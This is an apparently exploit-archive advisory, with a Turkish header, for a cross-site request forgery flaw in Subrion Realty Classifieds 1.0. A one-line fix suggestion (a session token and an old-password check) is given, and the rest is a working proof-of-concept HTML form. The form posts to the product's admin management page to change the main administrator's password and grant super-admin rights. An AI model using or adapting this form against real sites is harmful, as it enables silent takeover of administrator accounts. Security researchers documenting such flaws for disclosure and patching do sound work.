< ------------------- header data start ------------------- >

#############################################################

# Application Name :Subrion Realty Classifieds

# Version : 1.0

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://realty.subrion.com/admin/admins_manage.php?id=1&action=edit method=post>
<input type=hidden name=prevent_csrf value=7436541f3a /><table cellspacing=0 cellpadding=0 width=100% class=striped>
<tr>
<td class=caption colspan=2><strong>General Information</strong></td>
</tr>
<tr>
<td width=200><strong>username:</strong></td>
<td><input type=text name=username size=22 value=admin/></td>
</tr>
<tr>
<td><strong>Full Name:</strong></td>
<td><input type=text name=fullname size=22 value=Administrator/></td>
</tr>
<tr>
<td><strong>Email:</strong></td>
<td><input type=text name=email size=22 value=[email protected] /></td>
</tr>
<tr>
<td><strong>password:</strong></td>
<td><input type=password name=new_pass size=22 /></td>
</tr>
<tr>
<td><strong>password Confirmation:</strong></td>
<td><input type=password name=new_pass2 size=22 /></td>
</tr>
<tr>
<td><strong>Status:</strong></td>
<td><select name=status>
<option value=approval >Approval</option>
<option value=active selected=selected>Active</option>
</select></td>
</tr>

<tr>
<td class=caption colspan=2><strong>Admin Permissions</strong></td>
</tr>
<tr>
<td><strong>Super Admin:</strong></td>
<td><input type=radio name=super value=1 id=type1 checked=checked onclick=javascript:$(’#permissions’).fadeOut(); /><label for=type1>Enabled</label>
<input type=radio name=super value=0 id=type0 onclick=javascript:$(’#permissions’).fadeIn();/><label for=type0>Disabled</label>
</td>
</tr>
</table>
<div id=permissions style=display: none;>
<fieldset class=collapsible style=margin-left: 20px;><legend>Common</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Common’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=admin_home id=tsadmin_home /><label for=tsadmin_home>Admin Panel</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=configuration id=tsconfiguration /><label for=tsconfiguration>Configuration</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=admins_manage id=tsadmins_manage /><label for=tsadmins_manage>Manage Admins</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=pages_manage id=tspages_manage /><label for=tspages_manage>Manage Pages</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=plugins_manage id=tsplugins_manage /><label for=tsplugins_manage>Manage Plugins</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=packages_manage id=tspackages_manage /><label for=tspackages_manage>Manage Packages</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=database_manage id=tsdatabase_manage /><label for=tsdatabase_manage>Manage Database</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=menus_manage id=tsmenus_manage /><label for=tsmenus_manage>Manage Menus</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=language_manage id=tslanguage_manage /><label for=tslanguage_manage>Language Manager</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=blocks_manage id=tsblocks_manage /><label for=tsblocks_manage>Manage Blocks</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=visual_manage id=tsvisual_manage /><label for=tsvisual_manage>Visual Manage</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=transactions_manage id=tstransactions_manage /><label for=tstransactions_manage>Manage Transactions</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=plans_manage id=tsplans_manage /><label for=tsplans_manage>Manage Plans</label></li></fieldset><fieldset class=collapsible style=margin-left: 20px;><legend>Accounts</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Accounts’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_manage id=tsaccounts_fields_manage /><label for=tsaccounts_fields_manage>Accounts Fields</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_groups_manage id=tsaccounts_fields_groups_manage /><label for=tsaccounts_fields_groups_manage>Accounts FieldGroups</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_manage id=tsaccounts_manage /><label for=tsaccounts_manage>Manage Accounts</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_search id=tsaccounts_search /><label for=tsaccounts_search>Search account</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_add id=tsaccounts_add /><label for=tsaccounts_add>Add account</label></li></fieldset><fieldset class=collapsible style=margin-left: 20px;><legend>Realty</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Realty’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li style=float: left; width: 150px;><input type=checkbox class=group_Realty name=permissions[] value=estates_manage id=tsestates_manage /><label for=tsestates_manage>Manage Estates</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Realty name=permissions[] value=estate_submit id=tsestate_submit /><label for=tsestate_submit>Sell Realty</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Realty name=permissions[] value=estates_fields_manage id=tsestates_fields_manage /><label for=tsestates_fields_manage>Estates Fields</label></li></fieldset><fieldset class=collapsible style=margin-left: 20px;><legend>Other</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Other’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=admin_help id=tsadmin_help /><label for=tsadmin_help>Help</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=rating id=tsrating /><label for=tsrating>Rating</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=comments id=tscomments /><label for=tscomments>Comments</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=album id=tsalbum /><label for=tsalbum>Picture Gallery</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=banner_manage id=tsbanner_manage /><label for=tsbanner_manage>Banners</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=rss_manage id=tsrss_manage /><label for=tsrss_manage>RSS Manager</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=news_manage id=tsnews_manage /><label for=tsnews_manage>Manage News</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=testimonials id=tstestimonials /><label for=tstestimonials>Testimonials</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=contact_us id=tscontact_us /><label for=tscontact_us>Contact Us</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=polls_manage id=tspolls_manage /><label for=tspolls_manage>Manage Polls</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=event id=tsevent /><label for=tsevent>Events</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=faq_manage id=tsfaq_manage /><label for=tsfaq_manage>Manage FAQ</label></li></fieldset><div style=clear:both;></div>
</div>
<table cellspacing=0 width=100%>
<tr class=all>
<td colspan=2><input type=submit class=button name=save value=Save Changes />
<input type=hidden name=id value=1 />
<input type=hidden name=action value=edit />
</td>
</tr>
</table>
</form>

< -- bug code end of -- >